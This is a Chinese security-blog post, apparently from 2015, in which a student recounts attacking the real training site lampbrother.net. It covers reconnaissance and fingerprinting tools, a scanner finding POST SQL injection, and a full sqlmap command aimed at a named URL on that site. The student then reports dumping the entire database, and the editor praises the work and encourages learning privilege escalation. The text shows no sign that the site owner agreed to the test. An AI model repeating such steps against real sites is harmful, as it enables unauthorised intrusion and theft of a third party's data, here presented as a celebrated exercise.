学员渗透录二十九_兄弟连安全检测


Apr 15 2015

学员渗透录二十九_兄弟连安全检测

首页 » 学员作品 » 学员渗透录二十九_兄弟连安全检测   

学员渗透录二十九_兄弟连安全检测

作者:白狼 编辑:mOon 博客:www.moonsec.com

这篇文字终于可以发出来了。兄弟连现在加了cdn 漏洞也不存在了

1.png

于是乎将学员投稿多年的文章可以重见光日。

现在开始正文:

感谢师父给我机会写文章,嘿嘿,开始吧,我们的目标是兄弟连
确定目标--信息收集 window环境下:http://www.lampbrother.net/ 我用aizhan.com先查下信息

2.png


Firefox+插件Live HTTP headers

3.png


御剑2014 查询的 发现有40多个旁站 怎么说呢 误报吧 有效的

4.png

Web指纹识别一下
用到的是椰树1.8---全功能接口修复版本和御剑WEB指纹识别系统
5.png

6.png



把市面上主流的cms的源码都下载一份,查看目录结构和robots,自己识别一下,对于上面椰树和御剑的结果 我只能说呵呵。

Kali里的用whatweb也可以快速的获取

7.png


Webcruiser扫描器 Web Vulnerability Scanner V2.8.3 官网下最新的 扫描一下 发现存在注入 (试下吧,有时候有可能是误报)

8.png

典型的post注入

9.png


现在上神器,sqlmap,安装的window版本的
Target:http://www.lampbrother.net/phptrain/susecc.php (POST)
userName=WCRTESTINPUT000000&sms=WCRTESTINPUT000001&button=
sqlmap.py --time-sec 20 -u http://www.lampbrother.net/phptrain/susecc.php --data "userName=WCRTESTINPUT000000&sms=WCRTESTINPUT000001&button=" --level 5 --dbs
10.png

然后就是爆tables columns 最后dump出来 裤子全部脱下来
11.png

结束咯。。

mOon:从初探都信息收集到安全检测、加上各类神器如wvs sqlmap 运用自如,个人认为做到相当到位咯,加油咯 赶快学会提权咯!

关注暗月博客,暗月近期会继续更新发表其他学员的文章。

没加群的小伙伴赶快加咯  Q群 131634501

如果您喜欢本博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容:

正文部分到此结束

文章标签: 学员渗透录 安全检测兄弟连

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «HTTP.sys远程执行代码漏洞(CVE-2015-1635,MS15-034) | sqlmap-tamper-scripts sqlmap tamper 详解»

你肿么看?

你还可以输入 250/250 个字

 微笑 大笑 拽 大哭 亲亲 流汗 喷血 奸笑 囧 不爽 晕 示爱 害羞 吃惊 惊叹 爱你 吓死了 呵呵

评论信息框

已有1条评论

匿名

2016-06-28 12:53 沙发
群找不